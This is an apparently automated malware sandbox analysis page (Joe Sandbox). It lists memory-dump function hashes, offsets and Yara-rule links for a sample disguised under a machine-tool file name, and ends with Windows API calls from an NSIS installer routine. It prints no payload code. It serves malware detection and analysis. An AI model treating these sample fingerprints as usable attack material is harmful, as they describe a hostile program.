                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4fb77157b353aa71306c8388b4212acad04cd20f0b57ddfe277792c32f124ca8
                                                                                                                                                                                                                          • Instruction ID: 01cd8f89d41c9d735f4b9399a009bb2b2050c603376e52e89399c8b9ddb5d592
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb77157b353aa71306c8388b4212acad04cd20f0b57ddfe277792c32f124ca8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31F774E012488BDB08DFEAC5416DEBBF2AF89300F24D42AC819BB255DB385946CF50
                                                                                                                                                                                                                          Function 00112878 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ebb22761907d1ee56faa32430980972cc0b3f363da71645a1374707e4ea8c5bb
                                                                                                                                                                                                                          • Instruction ID: e4c246fb876ef8a4af377876a36f125b1c9133f8ff0148d0ad5301e17245aae4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebb22761907d1ee56faa32430980972cc0b3f363da71645a1374707e4ea8c5bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6121B231A0011C9FCB18DF68C4509EE7BB5EB99368F58C029D8199B350DB34EE96CBD2
                                                                                                                                                                                                                          Function 0009D554 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5942969933.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9d000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 769db10822cfcd4181ff90efe9753085edd112f87ad3de122886a1ca677d6f37
                                                                                                                                                                                                                          • Instruction ID: f9440aadd935025df3e27146d1f8a9dce769340c52eed68e7c269c271d871e97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769db10822cfcd4181ff90efe9753085edd112f87ad3de122886a1ca677d6f37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE212575684340EFDF15DF14D9C0B2ABFA1FB88314F24C56AE8090B246C336D856EBA2
                                                                                                                                                                                                                          Function 000AD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943080241.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_ad000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 680521960728937b8232a4c30121d84a0da7b106d66f7d65944c8ea84b47bb4d
                                                                                                                                                                                                                          • Instruction ID: bdf9752d804c284673a6162f2f68df9873faa00502a181b24bf129b4c91077d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 680521960728937b8232a4c30121d84a0da7b106d66f7d65944c8ea84b47bb4d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42212575604300AFDB20CF64D9C4F26BBA1FB85314F20C96EE84A4B646C73AD846CA62
                                                                                                                                                                                                                          Function 00114205 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5098f585e3c4ec1b7dab8898f3134a574d5a07a6dc4e0c39f59a70ea4885a6dd
                                                                                                                                                                                                                          • Instruction ID: 648b7fb3afb1818aa6db1723ff62d3547e5bd5753a95d417b317cea4d102c011
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5098f585e3c4ec1b7dab8898f3134a574d5a07a6dc4e0c39f59a70ea4885a6dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45318079E51208DFCB48DFA8D59489DBBF2FF49305B208069E809AB324DB35AD51CF00
                                                                                                                                                                                                                          Function 001155D0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ef36221b7ee37acdf84b300aa32e62f36afd868c1c2d7df21d67b4b9fd357479
                                                                                                                                                                                                                          • Instruction ID: 890baf2b62be14167888bc9a634e9ed11481cb3d0575004e4d3b3169bd4887f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef36221b7ee37acdf84b300aa32e62f36afd868c1c2d7df21d67b4b9fd357479
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621A232604509DFDB09AFA4D445AEE3BA6EBC6314F414079F805DB2A5CB38DD92DBE0
                                                                                                                                                                                                                          Function 00117F2F Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4cb61ffe2e0d5e85709df77529f9169db6aa4b57e4dabddb4a0d962d9b47255c
                                                                                                                                                                                                                          • Instruction ID: 4ab66e442f0f54293193f83128456149747f11fd044fac5e2b21b76658830fc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb61ffe2e0d5e85709df77529f9169db6aa4b57e4dabddb4a0d962d9b47255c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E112B313086124BEB1D5629D8647FEA6E69FD0759F298039E412CB7E4EF29CCC29781
                                                                                                                                                                                                                          Function 001196E1 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c8f21a084fdcb001528f13f30c6d3ce2f573ce532c9982af3844038b2af56d73
                                                                                                                                                                                                                          • Instruction ID: 09f2753805519d662671a1176faf28c46398d3483a35a349398f635f8201f700
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8f21a084fdcb001528f13f30c6d3ce2f573ce532c9982af3844038b2af56d73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D217C35E112489FDB0CDFF1D560AEDBBF6AF89305F248069E411B62A0DB359A42DF10
                                                                                                                                                                                                                          Function 0011A360 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9d7e20c119770bebbe9039cfde5a9795009d170ed98a766feb2e12761ff29572
                                                                                                                                                                                                                          • Instruction ID: 31070afa1bfa9e1385202d6397d4d0552898397e24c9265697652f4b83b3ad0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d7e20c119770bebbe9039cfde5a9795009d170ed98a766feb2e12761ff29572
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21B431A01205DFDF18CF68C888BDEBFB2AF84314F588565D455AB691D3B1E890CB56
                                                                                                                                                                                                                          Function 0009D54F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5942969933.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9d000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 46170cc853492c51b5d3aee37104db3d90f42447897c3985e43b5152abe6c2d8
                                                                                                                                                                                                                          • Instruction ID: a489d22c3e95c91b7d97d68ff57e8fb520ee303e9aaf7575225a0bc89a6b16f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46170cc853492c51b5d3aee37104db3d90f42447897c3985e43b5152abe6c2d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F110376544280CFCF11CF14D5C4B16BFB1FB84314F24C5AAD8090B616C336D85ADBA2
                                                                                                                                                                                                                          Function 00112779 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2ae3f2a68d26548211adf93024867e36500cd826f317b5e2d9faf00e5d295e46
                                                                                                                                                                                                                          • Instruction ID: 96e8a3d8ba4c80e23ac5cfa8323c799c42eb112d70b92374140cbfb7800ed6ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ae3f2a68d26548211adf93024867e36500cd826f317b5e2d9faf00e5d295e46
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F21D674D0060A8FDB04EFB9D8446EEBFF1BF4A310F14526AD805B3264EB341A95CBA1
                                                                                                                                                                                                                          Function 000AD03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943080241.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_ad000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b8211d19549ce13da869c0f08bf0458015dedba19c7731aec5b5b1c5e98523d9
                                                                                                                                                                                                                          • Instruction ID: 1ddd4123093141b058bc9a8bf00f6ebd0bebc1b760f1ba28106daf6c12c6d7d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8211d19549ce13da869c0f08bf0458015dedba19c7731aec5b5b1c5e98523d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB11D075504280DFCB11CF54C5C4B15BBA1FB45314F24CAAED84A4B656C33AD84ACF52
                                                                                                                                                                                                                          Function 0011E6F0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0531d551e6092875c527ae248c22b0eee0b44797c057d40137a908be646f77ff
                                                                                                                                                                                                                          • Instruction ID: f409180432f5b205a2e8ef5d833eb5a8a2a73d3f67915ec119fbe656777c5b65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0531d551e6092875c527ae248c22b0eee0b44797c057d40137a908be646f77ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB112774D00209AFCB01CFA4C8456AEBBB1EB4E300F1145A5D910A7361D7396A56CB91
                                                                                                                                                                                                                          Function 00115E26 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ee5f98b229a24a031aadfc6e7e3b6b34538873cb2ce39656152a04c82bf841db
                                                                                                                                                                                                                          • Instruction ID: 2a316e6412ce781190c7d7959a6fc618859d825a1d0f7ec838425155a082502f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee5f98b229a24a031aadfc6e7e3b6b34538873cb2ce39656152a04c82bf841db
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3901F232B00414AFDB099E949810AEF3BABDBC9790B19803AF505C7240DF318D119BD0
                                                                                                                                                                                                                          Function 00117EE8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d887fadc49fc9de2e3891d0b3204368001d0fe3e1bd3950b6d4df6a8919c2974
                                                                                                                                                                                                                          • Instruction ID: 5d8d2df9806ca48ccb92ce71d7444164a0dd56328f4bb5bf93293983ea388246
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d887fadc49fc9de2e3891d0b3204368001d0fe3e1bd3950b6d4df6a8919c2974
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0923270A3900FC706227A985449B7FA6DBCB62971A00BFE505CB393DC268C0AD3A1
                                                                                                                                                                                                                          Function 00112827 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 970969b7309d99bf38a0dcdb930af4f42000fee0f62e2beedae1d7d7af4dcbad
                                                                                                                                                                                                                          • Instruction ID: f62b08766ab778c66c4098625cdbf5d68244b8e8741723d2d1ee740ced2fa19c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970969b7309d99bf38a0dcdb930af4f42000fee0f62e2beedae1d7d7af4dcbad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0E0DF35D1022A92CB20B6E48C144EEB738EFC9310F488512D12032180AE21260C86E1
                                                                                                                                                                                                                          Function 00112838 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: dcd9716388e5a94c5c4ad85ca5f8ef34cf649b0f33cd6b505e85ed4f82927e88
                                                                                                                                                                                                                          • Instruction ID: 481c3f4405378da5d39fdf636354777f9302f92f616e592793a55b6610df9056
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcd9716388e5a94c5c4ad85ca5f8ef34cf649b0f33cd6b505e85ed4f82927e88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8D05B31D2022A57CB00E7A5DC044DFFB38EED5325B594666D51437140FB71265DC6E1
                                                                                                                                                                                                                          Function 00117EF8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 60ce70399f3b4e6f62c127cf8ed42e473af352ca832878e8f71143d418b37899
                                                                                                                                                                                                                          • Instruction ID: 4e0385c7c92c7901be586a8cae892066b0489f7dca50fd96d20c27feb7345b9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60ce70399f3b4e6f62c127cf8ed42e473af352ca832878e8f71143d418b37899
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACD05E30704214178B19317AC84486F79DBDBCFB29B194038E80A97385DD659C039791
                                                                                                                                                                                                                          Function 001166B8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 307774a2c290552dd38db25a8f0aef0be9c482f46fd3eaeffbf1fb5cac1b3535
                                                                                                                                                                                                                          • Instruction ID: c7ada35937aea2ff23a9d8a829aeb363d61eda59dbef0d0be87be71fa6c73855
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 307774a2c290552dd38db25a8f0aef0be9c482f46fd3eaeffbf1fb5cac1b3535
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78E0123655A3810FE70397B199625943F75DA83510F8A44EBE5448F23BE96C091EC792
                                                                                                                                                                                                                          Function 00118E78 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                                                                                          • Instruction ID: 3b40a339f933d89c1bb3c2f323e59858cb66b647ea856f5a67c565cfd5a92885
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6C08C3360D5282AA23C204E7C40EE3BB8CC3C13B4B22813BFA5CD3200AC86ACC101F4
                                                                                                                                                                                                                          Function 0011D24C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fefc997d9112aecfe936e23e3e822965343248784245e9517189a11474799678
                                                                                                                                                                                                                          • Instruction ID: a196b18e334f2a5f91e6352d915361e74d230ffaecd08df1e68d1c087e509401
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fefc997d9112aecfe936e23e3e822965343248784245e9517189a11474799678
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAD04235E04109CFDB24DFA5E4454DCBBB0EB49311F20502AD925A3221D77458558F01
                                                                                                                                                                                                                          Function 0011AF2D Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2a072ca76b10771a61590824fa07b26ee3b0c717e07448356bf77feff64ee3b2
                                                                                                                                                                                                                          • Instruction ID: 5505bd8cab44bdfbfa3b9c682bf8b0fd3d4c1b2db15377e827a08a970b9bc588
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a072ca76b10771a61590824fa07b26ee3b0c717e07448356bf77feff64ee3b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D0673AB101489FDB049F98E880DDDB7B6FB98221B048126E915A3264C6319961DB90
                                                                                                                                                                                                                          Function 001166C8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fc16cd2af2b9ce74dfe8afef3aa90ffd5a9d89393d05890d15a78d58e8bfbff1
                                                                                                                                                                                                                          • Instruction ID: 06391f935b30a5a36fc095c9bd5638011f77d85e5346470dc50a61b8d2f3206b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc16cd2af2b9ce74dfe8afef3aa90ffd5a9d89393d05890d15a78d58e8bfbff1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6C0123246430647F642E7F1D95799573FEA7C0610F818435B2050A63DDE7C15168791

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 004030D9 Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 355comstringfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32 ref: 004030FE
                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00403104
                                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403153
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040315A
                                                                                                                                                                                                                          • SHGetFileInfoA.SHELL32(0041ECE0,00000000,?,00000160,00000000), ref: 00403176
                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040318B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 0040319E
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,00429000,00000020), ref: 004031C9
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004032C6
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004032D7
